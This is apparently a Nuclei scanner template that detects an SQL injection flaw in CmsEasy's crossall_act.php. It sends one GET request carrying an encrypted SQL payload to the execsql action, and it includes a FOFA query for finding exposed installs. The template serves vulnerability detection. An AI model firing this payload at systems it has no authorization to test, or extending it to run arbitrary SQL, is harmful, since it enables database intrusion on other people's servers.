id: cmseasy-crossall-sqli

info:
  name: CmsEasy crossall_act - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    CmsEasy crossall_act.php SQL Injection Vulnerability. CmsEasy has a SQL injection vulnerability. Any SQL command can be executed by encrypting the SQL statement in the file service.php.
  reference:
    - https://cn-sec.com/archives/1580677.html
    - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28
  classification:
    cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cmseasy
    product: cmseasy
    fofa-query: app="CmsEasy"
  tags: cmseasy,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"123":"123"}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207eafbac0ae8a18d27666f5d78163eddc88b3c3e4f7d4ee053bb8d7bf3bb7d1cf022100b55936708b73321d409beccdc6554ee9176472a9a2e574eb4092f2087607ef74:922c64590222798bb761d5b6d8e72950